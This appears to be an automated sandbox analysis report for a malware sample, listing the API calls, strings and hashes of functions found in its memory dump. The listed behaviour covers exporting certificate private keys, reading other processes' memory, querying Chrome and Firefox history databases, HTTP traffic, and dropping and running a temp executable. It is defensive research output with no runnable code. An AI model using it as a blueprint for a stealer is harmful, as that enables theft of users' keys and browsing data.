                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CodeExitNamedObjectPeekPipeProcessSingleWait
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2021502500-0
                                                                                                                              • Opcode ID: 71321f3c5b00947e8a7b57791e3d2b441492a2231b789ead44b8743cebe12814
                                                                                                                              • Instruction ID: 522cfbff681e7d04d8dbbfdf13edbe8bfd7f5d7858e449c751be7acd1b5f874b
                                                                                                                              • Opcode Fuzzy Hash: 71321f3c5b00947e8a7b57791e3d2b441492a2231b789ead44b8743cebe12814
                                                                                                                              • Instruction Fuzzy Hash: C4018022A08642C2EFD4AF21D540B78A361EF44F88F9C503EEA0D5A689DF2CDC85D320
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$FreeProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3859560861-0
                                                                                                                              • Opcode ID: 3522ce1484baedbfe33511e301451e993b837232db68b9421e2362fa418d2ba1
                                                                                                                              • Instruction ID: 2333f8993602ce0ab327fe18c1c60c2652614a601fbe156bbcbd0c55a2a9d853
                                                                                                                              • Opcode Fuzzy Hash: 3522ce1484baedbfe33511e301451e993b837232db68b9421e2362fa418d2ba1
                                                                                                                              • Instruction Fuzzy Hash: 73C01248F0A642C2FE9CA7E3645447183516F5DF85B8C4034DD4E297519E2C51D58210
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: wvsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2795597889-0
                                                                                                                              • Opcode ID: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
                                                                                                                              • Instruction ID: 2a9aefea84ba6b81df4c6d25ba56f61d4ea1f03e6780361e6c69373ce2134da7
                                                                                                                              • Opcode Fuzzy Hash: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
                                                                                                                              • Instruction Fuzzy Hash: 9FE06DB2A00B45C2D704DF25E98048CBBB5EB99FC8B948025DB4C2B324CF38D996C7A0
                                                                                                                              APIs
                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF763AF74DE), ref: 00007FF763AF79CD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoNativeSystem
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1721193555-0
                                                                                                                              • Opcode ID: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                                                                              • Instruction ID: 597f5c374cd6ada0ef1626ff5f877ed059db9b693acff27a2c34270838c88318
                                                                                                                              • Opcode Fuzzy Hash: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                                                                              • Instruction Fuzzy Hash: 1CD05E02C08482C2DAF27B00D446436E361BB58308FC80236E18D126A06F6ED689EA35
                                                                                                                              APIs
                                                                                                                              • CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF325E
                                                                                                                              • CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF763AF328D
                                                                                                                              • CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF32BB
                                                                                                                                • Part of subcall function 00007FF763AF36F0: CryptExportKey.ADVAPI32 ref: 00007FF763AF3744
                                                                                                                                • Part of subcall function 00007FF763AF36F0: CryptExportKey.ADVAPI32 ref: 00007FF763AF379E
                                                                                                                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF3336
                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF3380
                                                                                                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF763AF33AC
                                                                                                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF763AF33DC
                                                                                                                              • CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF763AF3404
                                                                                                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF763AF341C
                                                                                                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF763AF343F
                                                                                                                              • CryptAcquireContextA.ADVAPI32 ref: 00007FF763AF3459
                                                                                                                              • CryptImportKey.ADVAPI32 ref: 00007FF763AF347E
                                                                                                                              • OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF34B5
                                                                                                                              • OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF3505
                                                                                                                              • QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF3523
                                                                                                                              • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF3532
                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF355D
                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF357C
                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF763AF359F
                                                                                                                              • NCryptExportKey.NCRYPT ref: 00007FF763AF3605
                                                                                                                              • CertOpenStore.CRYPT32 ref: 00007FF763AF3667
                                                                                                                              • CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF763AF3682
                                                                                                                              • CertSetCertificateContextProperty.CRYPT32 ref: 00007FF763AF369E
                                                                                                                              • PFXExportCertStoreEx.CRYPT32 ref: 00007FF763AF36BD
                                                                                                                              • PFXExportCertStoreEx.CRYPT32 ref: 00007FF763AF36DF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Crypt$CertExport$CertificateOpenProcessProtectStoreVirtual$ContextMemory$AcquirePropertyReadService$AddressImportLibraryLinkLoadManagerPrivateProcQueryStatusUserWrite
                                                                                                                              • String ID: ,-1{$4(G$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$jlzm
                                                                                                                              • API String ID: 2161712720-3700434115
                                                                                                                              • Opcode ID: 1259beb20cac467e91f1b8e95cda7ef049d8c99ca71799bfb8c9a1caf3a4ca4f
                                                                                                                              • Instruction ID: cc5996c5efcd0cb9c9d1ae2e95393c346ab09846855e98ae31ac4baa84d5701c
                                                                                                                              • Opcode Fuzzy Hash: 1259beb20cac467e91f1b8e95cda7ef049d8c99ca71799bfb8c9a1caf3a4ca4f
                                                                                                                              • Instruction Fuzzy Hash: 1EE14D36B14A418AE754DF61E844AEDB3A1FB48788F84413AEE8D2BB58DF3CD109C750
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Http$CloseHandle$DataHeapOpenOptionQueryRequest$AvailableConnectCrackFreeProcessReadReceiveResponseSend
                                                                                                                              • String ID: =r:r$>r!r$>r!r
                                                                                                                              • API String ID: 199669925-1865137870
                                                                                                                              • Opcode ID: dd8ddd59f5a9d1b493c0ee37e8ab2d9d1496534815be34523f1cccd61e165c5d
                                                                                                                              • Instruction ID: 010b60d0c7c587cc2814605292064eed9324d2409c30eaa04a11ada122e50864
                                                                                                                              • Opcode Fuzzy Hash: dd8ddd59f5a9d1b493c0ee37e8ab2d9d1496534815be34523f1cccd61e165c5d
                                                                                                                              • Instruction Fuzzy Hash: BFA1E576B08781C6EB94EF6694409ADB7A1FB89B84F98403AEE4D57B48CF3CD405CB10
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$AddressCurrentLibraryLoadProcWow64
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4035193891-0
                                                                                                                              • Opcode ID: cdaa70f4b17d9021ac9a311444477d27912caa0ffaeae6d3bd1739126b036b9d
                                                                                                                              • Instruction ID: e9090f2eb1d7ff4b4b22cdeebb101f85c4b27c84d4426499a9213ed6be834247
                                                                                                                              • Opcode Fuzzy Hash: cdaa70f4b17d9021ac9a311444477d27912caa0ffaeae6d3bd1739126b036b9d
                                                                                                                              • Instruction Fuzzy Hash: F821C266E187C1C3EA916F21A44467AE790FB4D7C4F884239EACD16B46DF2CC104CB10
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CryptExport$HeapProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 532797600-0
                                                                                                                              • Opcode ID: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
                                                                                                                              • Instruction ID: 43e5eb5e5d4d26f74f7103997cb87f70485fbb352ccf2b15854488ab1fe676de
                                                                                                                              • Opcode Fuzzy Hash: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
                                                                                                                              • Instruction Fuzzy Hash: 6C21B236A19A42D2EB90EF11F550B79B3A0EB85B98F888235EA8D57794DF3CD401DB10
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 36bd63f4d4cfc2a336acc11997e3e8be8163387507807229baef538af77ab198
                                                                                                                              • Instruction ID: 7e37f21412b300875440bedbd3a741938f53d36bec7cf6e24ec9c00a3213306f
                                                                                                                              • Opcode Fuzzy Hash: 36bd63f4d4cfc2a336acc11997e3e8be8163387507807229baef538af77ab198
                                                                                                                              • Instruction Fuzzy Hash: 29618B53A082D58AF741AE3844516FD6FA2EB16788F8C0039FE8D63B87D92CD007E720
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6d01c7f7f70e755251e5213423192505223118269c658bfc9e31a8515983880f
                                                                                                                              • Instruction ID: 8c7abb24ddba906f7704c5328b35c5512e0a2c3455b1bf1c98051a83104d20d6
                                                                                                                              • Opcode Fuzzy Hash: 6d01c7f7f70e755251e5213423192505223118269c658bfc9e31a8515983880f
                                                                                                                              • Instruction Fuzzy Hash: 3C517A47A043C18CEB129E3984927EC6F52EB25788F89403AEF9967B47D53CD107D720
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Time$CloseCreateExecuteHandlePathShellSystemTempWritewsprintf
                                                                                                                              • String ID: %08X.exe$open
                                                                                                                              • API String ID: 2307396689-1771423410
                                                                                                                              • Opcode ID: bba04421ac46b7f48ba8affa5e7cfb2839c56d732febee506ba2c17effb61a40
                                                                                                                              • Instruction ID: e58ed21c203f67d40d76a914b433e9313a97ad60cadbbd97039f31a15fdf24ab
                                                                                                                              • Opcode Fuzzy Hash: bba04421ac46b7f48ba8affa5e7cfb2839c56d732febee506ba2c17effb61a40
                                                                                                                              • Instruction Fuzzy Hash: BE319576608A81D6E764DF20E884BE9A331FB8878DF844135EA4D5AA58CF3CC24DC710
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create$ArrayFileSafe$DataStringTime$AccessAllocCloseExecuteFreeHandleInitInitializeInstancePathShellSystemTempUnaccessVariantVectorWritewsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1750269033-0
                                                                                                                              • Opcode ID: 1c5d2654c08cc8127abb35339070594f2d16baf8560606254011173d46aa1ed8
                                                                                                                              • Instruction ID: 70a94f4a885eacc3d71f377be7b48803eb0bed55353d6ca216b4c31cac9ac1c3
                                                                                                                              • Opcode Fuzzy Hash: 1c5d2654c08cc8127abb35339070594f2d16baf8560606254011173d46aa1ed8
                                                                                                                              • Instruction Fuzzy Hash: 83616D36B04A46D6EB44EF65D454BAC63B0FB48B88F888136DE0D6BB58DF39D509D320
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00007FF763AF25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF763AF1985,?,?,?,00007FF763AF155F), ref: 00007FF763AF25E5
                                                                                                                              • __memcpy.DELAYIMP ref: 00007FF763AFED57
                                                                                                                                • Part of subcall function 00007FF763B00128: __memcpy.DELAYIMP ref: 00007FF763B00159
                                                                                                                                • Part of subcall function 00007FF763B00128: __memcpy.DELAYIMP ref: 00007FF763B00167
                                                                                                                                • Part of subcall function 00007FF763AFEBA8: lstrlenA.KERNEL32 ref: 00007FF763AFEBC5
                                                                                                                                • Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
                                                                                                                                • Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                              • String ID: last_visit_time$table$url$urls
                                                                                                                              • API String ID: 2336645791-3896411411
                                                                                                                              • Opcode ID: 357bbd6d5dbf52a54e225c9b0824b1a8228270d85fc39889bc92869a6edfa572
                                                                                                                              • Instruction ID: c178eec85a530c1958435745eb227fcce1074ecc9bf4be322480efc65fc82044
                                                                                                                              • Opcode Fuzzy Hash: 357bbd6d5dbf52a54e225c9b0824b1a8228270d85fc39889bc92869a6edfa572
                                                                                                                              • Instruction Fuzzy Hash: 12316662A08782D1EAA0EF26F840DB9A350FB84BC4F845037EE8D57795EE3CE545D710
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00007FF763AF25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF763AF1985,?,?,?,00007FF763AF155F), ref: 00007FF763AF25E5
                                                                                                                              • __memcpy.DELAYIMP ref: 00007FF763AFEF77
                                                                                                                                • Part of subcall function 00007FF763B00128: __memcpy.DELAYIMP ref: 00007FF763B00159
                                                                                                                                • Part of subcall function 00007FF763B00128: __memcpy.DELAYIMP ref: 00007FF763B00167
                                                                                                                                • Part of subcall function 00007FF763AFEBA8: lstrlenA.KERNEL32 ref: 00007FF763AFEBC5
                                                                                                                                • Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
                                                                                                                                • Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                              • String ID: last_visit_date$moz_places$table$url
                                                                                                                              • API String ID: 2336645791-66087218
                                                                                                                              • Opcode ID: 4233694b9c8e2b5a04e5395ae437dadce168e51b21df55109dc3daabe91f76a2
                                                                                                                              • Instruction ID: acfbefa45715c574d7fe8a46eb1f0647970793aff9410dc011cabdcefd395f95
                                                                                                                              • Opcode Fuzzy Hash: 4233694b9c8e2b5a04e5395ae437dadce168e51b21df55109dc3daabe91f76a2
                                                                                                                              • Instruction Fuzzy Hash: 46318A52608743D2EAB0EB26E8409B9A390FB84BC0F88803BEE8D57795EF7CD545D710
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00007FF763AF25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF763AF1985,?,?,?,00007FF763AF155F), ref: 00007FF763AF25E5
                                                                                                                              • __memcpy.DELAYIMP ref: 00007FF763AFF1A3
                                                                                                                                • Part of subcall function 00007FF763B00128: __memcpy.DELAYIMP ref: 00007FF763B00159
                                                                                                                                • Part of subcall function 00007FF763B00128: __memcpy.DELAYIMP ref: 00007FF763B00167
                                                                                                                                • Part of subcall function 00007FF763AFEBA8: lstrlenA.KERNEL32 ref: 00007FF763AFEBC5
                                                                                                                                • Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
                                                                                                                                • Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                              • String ID: last_visit_time$table$url$urls
                                                                                                                              • API String ID: 2336645791-3896411411
                                                                                                                              • Opcode ID: a171a44af3a4df966d00269ea52e92be7625e96530e226e40d767a69d8147b6d
                                                                                                                              • Instruction ID: a8f34c6e6f484bc13de35af25a8ae26c8843ccde25440a551aecaf4d0b659cd7
                                                                                                                              • Opcode Fuzzy Hash: a171a44af3a4df966d00269ea52e92be7625e96530e226e40d767a69d8147b6d
                                                                                                                              • Instruction Fuzzy Hash: 2E31A666608782C1EEA4EB26E4409F9A790FB84BC0F84813BEE8D67795EE3CD445D710
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
